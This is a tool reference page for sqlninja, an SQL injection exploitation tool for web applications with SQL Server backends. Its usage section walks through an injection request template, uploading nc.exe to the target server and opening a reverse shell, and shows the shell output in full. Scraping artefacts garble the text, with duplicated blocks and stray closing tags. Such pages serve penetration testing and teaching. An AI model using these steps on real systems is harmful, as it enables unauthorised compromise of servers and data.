Menu
▾
▴
sqlninja-en
sqlninja
Phase(s):
Primary: Exploitation.
Secondary: N/A.
Description:
Tool specialized in exploiting SQL Injection vulnerabilities present on web applications with a SQL Server database backend. Its functionalities range from data mining to compromise the application server through an uploaded shell.
Objective:
- Compromise the application server by exploiting a SQL Injection.
Features:
Supported technologies: Web applications (HTTP/HTTPS) with a SQL Server database backend.
Operative mode: Active.
Compromise the application server by exploiting a SQL Injection.
- Provides information about the database configuration.
- Provides a file upload functionality in order to execute malicious file in the application server.
- Performs a dictionary based brute force attack to retrieve the “sa” account password.
- Provide a functionality to execute operative systems commands.
Reports:
Output reports: X
Basic usage:
Create a Reverse Shell on the database server. Edit the sqlninja configuration file to include the following information:
- Petition with the vulnerable parameter.
- Local IP address.
The configuration file will be similar to the following:
…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6¶m_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end—
…
# Local host: your IP address (for backscan and revshell modes)
lhost = localhost
…
########### HTTP REQUEST ############
# The entire HTTP request, including the exploit string and a marker for the
# SQL command to execute (__SQL2INJECT__)
# Be sure to include the vulnerable parameter and the character sequence that
# allows us to start injecting commands. In general this means, at least:
# - an apostrophe (if the parameter is a string)
# - a semicolon (to end the original query)
--httprequest_start--
POST http://URL/PAGE.aspx HTTP/1.1
Host: HOST_APPLICACION
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:18.0)
OTRAS_CABECERAS
__VIEWSTATE=%2FwEPDwUKMjA3NjE4MDczNmRkf2IECGUitTpu0vVIUhu3wPxao%2FF6r4sHEdlYxzYXX%2F8%3D&
__EVENTVALIDATION=%2FwEWAwLv6%2FCgCgL%2F%2BOneAgKfwImNC3%2Fnbpb9DZ7tw0IU78vRV%2BiuANd7HLE5bz%2B5vRy0MIk6¶m_vulnerable=Dato';__SQL2INJECT__&ctl02=Search%21
--httprequest_end—
…
# Local host: your IP address (for backscan and revshell modes)
lhost = localhost
…
Once the configuration is in place it can be used by the tool which will display the message “Let’s rock !!! :)” in case the SQL Injection is successful.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m t
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
</r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
[+] Trying to inject a 'waitfor delay'....
[+] Injection was successful! Let's rock !! :)
</r00t@northernfortress.net>
Execute the following command “. /sqlninja -m u“ and select the option “apps/nc.exe”.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m u
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :) </r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: HOST_ATAQUE
Specify the binary or script file to upload
shortcuts:
1: apps/nc.exe
2: apps/dnstun.exe
3: apps/churrasco.exe
4: apps/icmpsh.exe
5: apps/vdmallowed.exe
6: apps/vdmexploit.dll
> 1
[+] Uploading /tmp/nc.scr debug script............
1540/1540 lines written
done!
[+] Converting script to executable... might take a while
[+] Checking that nc.exe has the expected filesize...
[+] Filesize corresponds... :) </r00t@northernfortress.net>
The tool will upload the file with the objective to create a reverse shell by using the following command “./sqlninja -m r”.
root@maguey:/tools/explotation/sqlninja # ./sqlninja -m r
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...
Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME
</r00t@northernfortress.net>
Sqlninja rel. 0.2.6-r1
Copyright (C) 2006-2011 icesurfer <r00t@northernfortress.net>
[+] Parsing sqlninja.conf...
[+] Target is: xxx.xxx.xxx.xxx:80
Local port: PUERTO_LOCAL
tcp/udp [default: tcp]: PROTOCOLO_TCP_O_UDP
[+] waiting for shell on port PUERTO_LOCAL/PROTOCOLO...
Microsoft Windows #### [Version #####]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>whoami
whoami
HOSTNAME\USERNAME
</r00t@northernfortress.net>
Resources:
Link: http://sqlninja.sourceforge.net/
Author(s): icesurfer
Contact: r00t [at] northernfortress.net
License: GPL versión 3
